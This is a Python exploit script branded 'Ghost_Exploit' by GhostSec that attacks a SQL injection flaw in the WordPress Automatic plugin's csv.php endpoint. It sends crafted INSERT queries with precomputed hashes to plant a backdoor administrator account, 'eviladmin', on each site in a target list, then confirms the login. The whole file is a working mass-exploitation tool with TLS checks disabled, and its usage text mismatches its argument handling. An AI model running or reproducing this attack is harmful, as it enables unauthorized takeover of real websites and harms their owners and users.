import requests import sys import pyfiglet import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) RED = "\033[91m" GREEN = "\033[92m" BOLD = "\033[1m" RESET = "\033[0m" def print_banner(): ascii_art = pyfiglet.figlet_format("Ghost_Exploit", font="standard") print(f"{BOLD}{RED}{ascii_art}{RESET}") print(f"{BOLD}{GREEN}💀 Remote Code Execution in Wordpress automatic Plugin POC | By GhostSec 💀{RESET}\n") def print_usage(): print(f"{BOLD}{RED}Usage: python exploit.py targets.txt OR python exploit.py http://example.com{RESET}") print(f"{BOLD}{RED}Options:{RESET}") print(f"{BOLD}{GREEN} Example python RCE_Exploit.py -u http://testphp.vulnweb.com/{RESET}") print(f"{BOLD}{RED} targets.txt File containing target URLs, one per line.{RESET}") print(f"{BOLD}{RED} http://example.com A single target URL to exploit.{RESET}") def makeRequest(payload, hash, url): host = url.split('/', 3)[2] headers = { 'Host': host, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } data = {'q': payload, 'auth': b'\0', 'integ': hash} return requests.post(url, data=data, headers=headers, verify=False) def check_login(url): login_url = url + '/wp-login.php' payload = { 'log': 'eviladmin', 'pwd': 'admin', 'wp-submit': 'Log In', 'redirect_to': url + '/wp-admin/', 'testcookie': '1' } response = requests.post(login_url, data=payload, verify=False) return 'Dashboard' in response.text def exploit(target): url = target + '/wp-content/plugins/wp-automatic/inc/csv.php' print(f"{BOLD}{GREEN}[+] Creating user eviladmin on {target}{RESET}") response = makeRequest( "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')", "09956ea086b172d6cf8ac31de406c4c0", url) if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text: print(f"{BOLD}{RED}[!] Error in the payload on {target}{RESET}") return if "DATE" not in response.text: print(f"{BOLD}{RED}[!] Not vulnerable: {target}{RESET}") return print(f"{BOLD}{GREEN}[+] Giving eviladmin administrator permissions on {target}{RESET}") makeRequest( "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')", "bd98494b41544b818fa9f583dadfa2bb", url) print(f"{BOLD}{GREEN}[+] Exploit completed on {target}!{RESET}") print(f"{BOLD}{GREEN}[+] Administrator created: eviladmin:admin{RESET}") if check_login(target): print(f"{BOLD}{GREEN}[+] Login successful for eviladmin on {target}!{RESET}") else: print(f"{BOLD}{RED}[!] Login failed for eviladmin on {target}.{RESET}") def load_targets(file_path): with open(file_path, 'r') as file: return file.read().splitlines() if __name__ == "__main__": print_banner() if len(sys.argv) < 2: print_usage() sys.exit() if sys.argv[1] == '-h': print_usage() sys.exit() targets = [] if len(sys.argv) == 2: file_path = sys.argv[1] try: targets = load_targets(file_path) except FileNotFoundError: print(f"{BOLD}{RED}[!] File not found: {file_path}{RESET}") sys.exit() elif len(sys.argv) == 3: target = sys.argv[2] targets = [target] for target in targets: exploit(target)